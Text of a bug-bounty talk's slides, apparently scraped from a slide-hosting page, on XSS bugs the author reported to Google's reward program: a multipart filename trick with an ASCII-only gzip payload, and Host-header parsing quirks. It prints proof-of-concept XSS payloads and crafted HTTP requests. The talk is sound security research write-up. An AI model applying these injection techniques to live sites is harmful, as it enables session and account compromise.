or just a waste of time • Michał Bentkowski • Pentester @ securitum.pl • IT security interests: • Client-side issues. • Browser quirks, • Top 10 Google VRP reporters in 2014 • Social: • Blog: blog.bentkowski.info • @SecurityMB • sekurak.pl (PL)
or just a waste of time • Deal between companies and security researchers, • Lots of bug bounty programs, • Google Vulnerability Reward Program (VRP) • https://www.google.pl/about/appsecurity/reward-program/
or just a waste of time • QuickOffice - mobile productivity suite • Acquired by Google in 2012 • Incorporated to Google Docs in 2014 • But they’re not dead…
or just a waste of time • issues.quickoffice.com and issues2.quickoffice.com hosted JIRA • https://confluence.atlassian.com/jira/jira-security- advisory-2014-02-26-445188412.html
or just a waste of time • issues.quickoffice.com and issues2.quickoffice.com hosted JIRA • https://confluence.atlassian.com/jira/jira-security- advisory-2014-02-26-445188412.html
or just a waste of time • issues.quickoffice.com and issues2.quickoffice.com hosted JIRA • https://confluence.atlassian.com/jira/jira-security- advisory-2014-02-26-445188412.html
or just a waste of time • issues.quickoffice.com and issues2.quickoffice.com hosted JIRA • https://confluence.atlassian.com/jira/jira-security- advisory-2014-02-26-445188412.html
or just a waste of time • My favourite XSS • Postini Header Analyzer (http://www.google.com/postini/headeranalyzer) • Wikipedia: „Postini was an e-mail, Web security, and archiving service owned by Google since 2007. It provided cloud computing services for filtering e-mail spam and malware (before it was delivered to a client's mail server), offered optional e-mail archiving, and protected client networks from web-borne malware.” X-pstn-levels: (S: 0.00000/60.95723 CV:99.9000 R:95.91080 P: 95.91081 M:64.93900 C:93.23770 ) X-pstn-settings: 5 (2.00000:8.00000) r p M c
or just a waste of time • But it’s XSS via upload form… • So always upload dialog box. • The attack scenario? • The attacker sends a maliciously crafted ZIP file to the victim • The attacker needs to lure the victim into the vulnerable page • The victim needs to click on the upload button, then MANUALLY select the file (s)he was given from the attacker, • The victim needs to confirm the upload
or just a waste of time • Can we make an upload in such a way that the server sees that as a file upload while it’s a typical POST form from the browser’s perspective?
or just a waste of time • This application actually splits the string on semicolon. • <input name="file_1; name=file_1; filename=test.zip; a"> • Content-disposition: form-data; name="file_1; name=file_1; filename=test.zip; a" name="file_1; name=file_1; filename=test.zip; a" name="file_1; name=file_1; filename=test.zip; a"
or just a waste of time • Chrome tried to interpret the data in some encoding. • Unknown byte sequence in that encoding? HTML entity that! • 0x00 - 0x9F - allowed bytes • Rest (0xA0 - 0xFF) - forbidden bytes (characters) • Problem with ZIP. Why not TAR?
or just a waste of time • GZIP Structure: • 10 bytes header, • Body - containing DEFLATE stream • 8 byte footer: CRC32 checksum and original file length • 10 bytes header - no forbidden characters • 8 byte footer - easy to get rid of forbidden characters, • Body? • https://github.com/molnarg/ascii-zip • „A deflate compressor that emits compressed data that is in the [A-Za-z0-9] ASCII byte range.”
or just a waste of time • Lessons learnt? • Always try to find quirks in webservers, they may behave in a non-standard way. • When something doesn’t work in one browser, try in others.
or just a waste of time • Known misbehaviour of Internet Explorer • Found by Sergey Bobrov (@black2fan) in 2013 • Found some quirk in Google parsing of Host header • Let the hunting begin!
or just a waste of time HTTP/1.1 302 Found Date: Fri, 06 Mar 2015 08:35:32 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.36-0+deb7u3 Location: http://example.com/login.php Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html
or just a waste of time HTTP/1.1 302 Found Date: Fri, 06 Mar 2015 08:35:32 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.36-0+deb7u3 Location: http://example.com%2Flogin.php Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html
or just a waste of time GET /login.phphp/ HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: pl-PL User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: example.com/login.php DNT: 1 Connection: Keep-Alive Cache-Control: no-cache
or just a waste of time • Google Host header parsing • Host: www.google.com -> works • Host: www.google.com/test -> doesn’t work • Host: www.google.com:80 -> works • Host: www.google.com:80<anyting> -> also works!
or just a waste of time HTTP/1.1 302 Found Server: Apache/2.2.22 (Debian) Location: https://www.google.com%3a443%2fcse%2ftools %2fcreate_onthefly%3b%3c%2ftextarea%3e%3cscript %3ealert(1)%3c%2fscript%3e Host: www.google.com:443/cse/tools/create_onthefly;</ textarea><script>alert(1)</script>
or just a waste of time Location: https://www.google.com%3a443%2fcse%2ftools %2fcreate_onthefly%3b%3c%2ftextarea%3e%3csvg%2fonload %3dalert%28document%2edomain%29%3e%3b%2f%2e%2e%2f%2e %2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e %2f%2e%2e%2f Host: www.google.com:443/cse/tools/create_onthefly;</ textarea><svg/ onload=alert(document.domain)>;/../../../../../../../../../../../../. ./../
or just a waste of time • I really enjoy my participation in Google VRP, • Great way to enhance my skills as well as to get some money, • Learn about browsers, try to fuzz servers, • Be a bit lucky!
techspacekrk
cmusudakeisuke
nori_shinoda
oikon48
kworkdev
nikkei_engineer_recruiting
hssh2_bin
uhyo
minorun365
sonic
nrug_member
ynt0485
daitak
samanthasiow
palkan
badams
tammyeverts
mongodb
raygrieselhuber
orderedlist
danielanewman
seathinner
bcantrill
jonrohan
aleyda
